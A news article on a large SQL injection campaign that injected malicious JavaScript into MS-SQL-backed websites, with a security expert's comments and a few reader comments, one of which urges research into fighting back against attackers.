Security expert: Don't blame Microsoft for mass site defacements

Progress was made Monday in mitigating thousands of SQL-based Web sites injected with malicious Javascript code. However, one security expert says we can expect more such attacks in the near future.

A traditional SQL injection attack allows malicious attackers to execute commands on an application's database by injecting executable code. "What's different about this latest attack is the size and the level of sophistication," said Jeremiah Grossman, CTO of WhiteHat Security.

On Monday, CNET found a few sites still infected with the latest SQL-injection attack.

In the past, attackers have gone after a small niche of the Internet--say travel sites or sports sites--but with this latest attack, attackers have a generic way to blast the Internet, and they've chosen to attack sites running MS-SQL.

On Friday, Microsoft denied that new vulnerabilities within Internet Information Services are to blame for a rash of Web site defacements. Microsoft insists it's the application developer's responsibility to follow the company's best practices. These include constraining and sanitizing input data, using type-safe SQL parameters for data access, and restricting account permissions in the database.

Grossman agreed it's not Microsoft's fault, and said the attacks could have easily targeted another vendor's software. If users surf to an SQL-injected site, their browser will attempt to download a variety of exploits, not all of which are Microsoft-based. One site from the Shadowserver Foundation lists exploits affecting Real and other vendors alongside various Microsoft Security bulletins.

Grossman said that just turning off Javascript won't necessarily protect end users from this latest round of attacks since the attackers can use traditional HTML as well.

"It's said that the attacks never get worse, they only get better," Grossman said. But in terms of the good guys closing the gap with the attackers, he remains optimistic. He said with more diligence and more care, we can protect Web sites from these attacks.

[The_happy_switcher]

Why not blame Microsoft?

It's certainly a lot more entertaining.

[alegr]

News.com, heal thyself

The irony is that investor.news.com is also compromized. Cached page with a reference to 1.js can be found at http://209.85.173.104/search?q=cache:n2aGb4qANisJ:investor.news.com/Master_Picks_Track_Record.html%3FGUID%3D4496747%26Page%3DMEDIAVIEWER+1.js+site:news.com&hl=en&ct=clnk&cd=4&gl=us

[MEE-S31]

So, what do we do about it?

Ok I think I am getting some traction on the don't blame the victim message, so now what do we do about it?
My thought is that MS and McAffee, Avert, all the development houses are working at what they can do as fast as they can.
With Microsoft and it's secure development lifecycle they are trying to make their software as safe as they can. The AV writers are working overtime keeping up to virus signatures.
Governments, police and militaries seem to be handycapped, not enough manpower, poor focus or something. They have problems with finding and if they can find them, getting to major MalZ.
We need to sit down, look at the issue and then figure out what to do about it.
To this end I have started S31. A school of systems and applications experts and leaders in the internet martial arts. We have taken it onto ourselves to focus our attentions not on describing the problem or looking at ways to protect our systems; but what can be done to combat the attacks we have been subjected to for so long.
Clearly trying to bring the MalZ to justice using arrests and prosecution is not working. This mostly falls into the problem of jurisdictions and the fact a lot of these are either by governement or allowed by governments that are not exactly frendly to the west.
Also creating technical means to stop the attacks is not working to it's full potential. While these efforts have been good enough uptil now, good enough does not mean perfect. We and all who want to be free on the internet appreciate their efforts and encourage them to keep up what they are doing as it is very important. But we need something more.
In the last few weeks we have been encouraged by other's efforts in testing techniques to possibly fight back. We need to keep up this research.
S31 will be continuing these efforts in parrallel with other researchers ss well as defining requirements for the work ahead.
So for now, patch your systems with every patch you can. Run a good virus scanner in an active scanning role. Use 2 fire walls, a hardware firewall at your internet connection and a software firewall on every sngle PC you own.
Use good malware scanners, use two just to be sure. We also recommend using a second antivirus on a manual scan once in a while, once a week if you are on the net much, once a month otherwise.
Be on the lookout for all and any social enmgineering, phishing and whaling. Educate the people around you. teach them how to protect themselves. And keep at it, people get complacent once they have been uninfected for a while. People don't want to have to be security experts, they just want to read their email and surf the web. We hope that in the future they can do just that.
And remember don't blame the victim, it doesn't help anybody and makes us take our focus off of the people who are the real problem.